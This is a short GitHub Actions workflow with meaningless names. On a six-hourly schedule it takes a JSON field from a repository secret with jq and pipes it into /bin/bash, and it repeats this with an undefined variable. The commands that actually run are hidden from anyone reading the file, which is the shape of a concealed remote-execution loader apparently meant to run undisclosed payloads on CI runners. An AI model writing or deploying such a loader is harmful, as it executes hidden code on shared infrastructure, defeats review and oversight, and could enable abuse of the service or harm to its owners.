name: caoyuqb
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caoyuqb
        env:
          h84: ${{ secrets.h84 }}
        run: |
          echo $h84 | jq -r .q5 | /bin/bash
          echo $wc8563 | jq -r .xit801 | /bin/bash

